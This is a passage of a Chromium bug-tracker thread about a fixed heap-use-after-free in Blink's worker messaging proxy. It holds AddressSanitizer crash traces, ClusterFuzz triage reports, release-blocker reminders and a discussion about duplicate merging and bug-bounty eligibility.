C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:190 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent Shadow bytes around the buggy address: 0x306b8990: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa 0x306b89a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x306b89b0: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x306b89c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa 0x306b89d0: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa =>0x306b89e0: fd fd fd fd fd[fd]fd fd fd fd fa fa fa fa fd fd 0x306b89f0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x306b8a00: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa 0x306b8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x306b8a20: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd 0x306b8a30: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==11028==ABORTING
,
Oct 4 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5430891503681536
,
Oct 4 2016
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=6153749666201600 Fuzzer: inferno_twister Job Type: linux_asan_chrome_media Platform Id: linux Crash Type: UNKNOWN Crash Address: 0x7ee25b121a18 Crash State: blink::PersistentBase<blink::DummyGCBase, blink::CrossThreadPersistentRegion::shouldTracePersistentNode blink::PersistentRegion::tracePersistentNodes Recommended Security Severity: Medium Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_media&range=421705:421755 Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv958d69tlAG40oN1djK1gP96Y0OtBjQpbvCXjN1lFgP6iGjvXHfxsSAuXBEZn9LPbfTsgqyTouuzoOYpiVKneeyqfNik0DBOnXDSvJs04lUgMkOnYdBu5EkoKojcqHDVXtPFr3FcX3QYbW7jWSwVsdxKc6YB4zxEcjY0R3fE7BGyzJ17XEI?testcase_id=6153749666201600 See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
,
Oct 4 2016
,
Oct 4 2016
Guessing https://codereview.chromium.org/2374693002/ based on regression range.
,
Oct 5 2016
,
Oct 5 2016
This issue is a security regression. If you are not able to fix this quickly, please revert the change that introduced it. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 6 2016
ClusterFuzz has detected this issue as fixed in range 422899:423265. Detailed report: https://cluster-fuzz.appspot.com/testcase?key=6153749666201600 Fuzzer: inferno_twister Job Type: linux_asan_chrome_media Platform Id: linux Crash Type: UNKNOWN Crash Address: 0x7ee25b121a18 Crash State: blink::PersistentBase<blink::DummyGCBase, blink::CrossThreadPersistentRegion::shouldTracePersistentNode blink::PersistentRegion::tracePersistentNodes Recommended Security Severity: Medium Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_media&range=421705:421755 Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_media&range=422899:423265 Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv958d69tlAG40oN1djK1gP96Y0OtBjQpbvCXjN1lFgP6iGjvXHfxsSAuXBEZn9LPbfTsgqyTouuzoOYpiVKneeyqfNik0DBOnXDSvJs04lUgMkOnYdBu5EkoKojcqHDVXtPFr3FcX3QYbW7jWSwVsdxKc6YB4zxEcjY0R3fE7BGyzJ17XEI?testcase_id=6153749666201600 See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information. If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Oct 7 2016
**** Bulk edit - please ignore if not applicable **** This bug is reported as M55 Beta blocker and we're getting closer to M55 Beta promotion. Please plan to have fix ready and merged to M55 branch (2883) by 5:00 PM PT, Monday(10/10) so it has enough baking time in Dev before Beta promotion. Thank you.
,
Oct 13 2016
,
Oct 15 2016
keishi: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 17 2016
,
Oct 19 2016
,
Oct 26 2016
**** Bulk edit - please ignore if not applicable **** A friendly reminder that M55 Stable is launch is coming soon! Your bug is labelled as Stable ReleaseBlock, pls make sure to land the fix and get it merged into the release branch ASAP so it gets enough baking time in Beta (before Stable promotion). Thank you!
,
Oct 31 2016
Original report and https://cluster-fuzz.appspot.com/testcase?key=5430891503681536 both look fixed
,
Oct 31 2016
,
Oct 31 2016
,
Nov 2 2016
Just had a try in latest build and it's still reproduced: Chromium 56.0.2907.0 (Developer Build) (32-bit) ( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-429061.zip?generation=1478037988846000&alt=media ) ================================================================= ==79772==ERROR: AddressSanitizer: heap-use-after-free on address 0x040d9a5c at pc 0x1b145033 bp 0x01b3d57c sp 0x01b3d570 READ of size 4 at 0x040d9a5c thread T0 ==79772==WARNING: Failed to use and restart external symbolizer! ==79772==*** WARNING: Failed to initialize DbgHelp! *** ==79772==*** Most likely this means that the app is already *** ==79772==*** using DbgHelp, possibly with incompatible flags. *** ==79772==*** Due to technical reasons, symbolization might crash *** ==79772==*** or produce wrong results. *** #0 0x1b145032 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:192 #1 0x1b15611b in base::internal::FunctorTraits<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),void>::Invoke<blink::InProcessWorkerMessagingProxy *,const WTF::String &,std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >,const int &> C:\b\c\b\win_asan_release\src\base\bind_internal.h:214 #2 0x1b155f2d in base::internal::Invoker<base::internal::BindState<void (blink::InProcessWorkerMessagingProxy::*)(const WTF::String &, std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> >, int) __attribute__((thiscall)),WTF::UnretainedWrapper<blink::InProcessWorkerMessagingProxy,WTF::FunctionThreadAffinity::CrossThreadAffinity>,WTF::String,WTF::PassedWrapper<std::unique_ptr<blink::SourceLocation,std::default_delete<blink::SourceLocation> > >,int>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #3 0x14d601c7 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50 #4 0x18bb905c in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:358 #5 0x18bb4db6 in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:250 #6 0x18bbd0b8 in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #7 0x14d601c7 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50 #8 0x14bb6440 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413 #9 0x14bb84fc in base::MessageLoop::DoDelayedWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:554 #10 0x14d692f2 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:39 #11 0x14bb5689 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378 #12 0x14c4b53d in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #13 0x1c22b471 in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198 #14 0x14a28097 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:408 #15 0x14a2992f in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:776 #16 0x14a27be4 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20 #17 0xf9611ba in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97 #18 0xeca6db in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174 #19 0xec1b1a in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:247 #20 0x1321304 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253 #21 0x74f338f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x138f3) #22 0x77755de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65de2) #23 0x77755dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65dad) 0x040d9a5c is located 44 bytes inside of 80-byte region [0x040d9a30,0x040d9a80) freed by thread T0 here: #0 0x1305878 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44 #1 0x1b997938 in blink::CompositorWorkerMessagingProxy::~CompositorWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\compositorworker\CompositorWorkerMessagingProxy.cpp:18 #2 0x1b1490a9 in blink::ThreadedMessagingProxyBase::workerThreadTerminated C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\ThreadedMessagingProxyBase.cpp:129 #3 0x14d601c7 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50 #4 0x18bb905c in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:358 #5 0x18bb4db6 in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:250 #6 0x18bbd0b8 in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #7 0x14d601c7 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50 #8 0x14bb6440 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413 #9 0x14bb80bc in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:513 #10 0x14d69544 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35 #11 0x14bb5689 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378 #12 0x14c4b53d in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #13 0x1c22b471 in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198 #14 0x14a28097 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:408 #15 0x14a2992f in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:776 #16 0x14a27be4 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20 #17 0xf9611ba in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97 #18 0xeca6db in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174 #19 0xec1b1a in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:247 #20 0x1321304 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253 #21 0x74f338f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x138f3) #22 0x77755de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65de2) #23 0x77755dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x65dad) previously allocated by thread T0 here: #0 0x130595c in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65 #1 0x143757ea in WTF::Partitions::fastMalloc C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\allocator\Partitions.h:99 #2 0x18de7c0a in blink::DedicatedWorkerMessagingProxyProviderImpl::createWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\DedicatedWorkerMessagingProxyProviderImpl.cpp:62 #3 0x1b126910 in blink::Worker::createInProcessWorkerMessagingProxy C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:49 #4 0x1b1240a6 in blink::InProcessWorkerBase::initialize C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerBase.cpp:63 #5 0x1b126508 in blink::Worker::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\Worker.cpp:30 #6 0x195a36c8 in blink::V8Worker::constructorCallback C:\b\c\b\Win_ASan_Release\src\out\Release\gen\blink\bindings\core\v8\V8Worker.cpp:216 #7 0x1173c45e in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments.cc:19 #8 0x119ee627 in v8::internal::`anonymous namespace'::HandleApiCallHelper<1> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:106 #9 0x119ec2cd in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:131 #10 0x119eb4f8 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:123 SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\InProcessWorkerMessagingProxy.cpp:192 in blink::InProcessWorkerMessagingProxy::dispatchErrorEvent Shadow bytes around the buggy address: 0x3081b2f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3081b300: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa 0x3081b310: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fd 0x3081b320: fd fd fd fd fd fd fa fa fa fa fd fd fd fd fd fd 0x3081b330: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd =>0x3081b340: fd fd fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd 0x3081b350: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fa fa 0x3081b360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3081b370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fd 0x3081b380: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x3081b390: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==79772==ABORTING
,
Nov 2 2016
keishi@, can you take a look at c#23?
,
Nov 2 2016
,
Nov 7 2016
**** Bulk edit - please ignore if not applicable **** A friendly reminder that M55 Stable is launch is coming soon! Your bug is labelled as Stable ReleaseBlock, pls make sure to land the fix and get it merged into the release branch ASAP so it gets enough baking time in Beta (before Stable promotion). Thank you! Also due to Thanksgiving holidays in US, please make sure all fixes are ready and merged to M55 latest by 5:00 PM PT Friday, 11/18/16.
,
Nov 7 2016
FYI: I ran the script on the original report on ToT w/ ASan and couldn't reproduce this. My env is as follows: Chromium: 56.0.2913.0 (Developer Build) (64-bit) Revision: 3c8a4fdc731c2d663383b270549ff5af4103ca17-refs/heads/master@{#430236} OS: Linux
,
Nov 7 2016
This could be fixed by https://codereview.chromium.org/2478113002/ loobenyang@, could you check whether this still happens after the patch?
,
Nov 7 2016
It looks like https://codereview.chromium.org/2478113002/ should fix this crash. I have been unsuccessful at reproducing this even when using the exact binaries specified by loobenyang@. So if loobenyang@ could confirm if its fix that would be great.
,
Nov 7 2016
Just tried but could not reproduce it with the same test case in this new build: Chromium 56.0.2913.0 (Developer Build) (32-bit) ( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-430287.zip?generation=1478547138770000&alt=media )
,
Nov 7 2016
Thank you for confirming it :)
,
Nov 7 2016
I'll merge this issue into issue 653865 based on c#30. If you still see this UAF, feel free to comment on this issue.
,
Nov 7 2016
Based on the issue numbers, this bug report was filed much earlier than 653865. Is there any reason not marking 653865 as duplicate of this one?
,
Nov 8 2016
The fix was associated with issue 660427 that was merged into issue 653865, so I merged this issue into issue 653865, too. Are you concerned about the reward program[1]? I don't have a right to decide whether this issue is eligible, but I'll add "reward-topanel" label so that people who manage the program can easily find this report. [1] https://www.google.com/about/appsecurity/chrome-rewards/index.html
,
Nov 8 2016
,
Nov 9 2016
Is there any reason to mark it as "reward-ineligible " ? This bug (652047) is filed earlier than bug 653865 and 660427. It's valid but other two bugs should be duplicate instead according to the following rule on the web page https://www.google.com/about/appsecurity/chrome-rewards/index.html There are three rules to keep in mind: Only the first report of a given issue that we were previously unaware of is eligible. In the event of a duplicate submission, the earliest filed bug report in the bug tracker is considered the first report.
,
Nov 9 2016
According to https://bugs.chromium.org/p/chromium/issues/detail?id=653865#c36, a manual review should be conducted.
,
Nov 10 2016
Thanks nhiroki. Could you add a topanel tag again? Don't think the security team can see this report currently.
,
Nov 11 2016
,
Nov 11 2016
,
Nov 11 2016
Is the label "reward-ineligible" generated by a bot? or the security team did review the reports? I have no access to other reports. However, based on the issue numbers, this bug report was filed earlier than others and so it's an valid report. Closing this bug as Fixed would better reflect the fact than Duplicate. If the panel can add a note here to explain why, I would appreciate it.
,
Nov 14 2016
awhalley@ would be a member of the security team. awhalley@, could you answer loobenyang@'s questions?
,
Nov 14 2016
,
Nov 15 2016
Sorry about the confusion there. This is still being considered for a reward, but we're now tracking it on the duplicate issue. Since this report is older, the bot is smart enough to apply reward-topanel to the other bug so that we can still consider it, but the comment on this issue is certainly confusing. We do this because we ignore duplicate issues in most of our reward-related queries. I'll cc you on the other bug, and this is being considered for a reward.
,
Feb 14 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by ClusterFuzz
, Oct 3 2016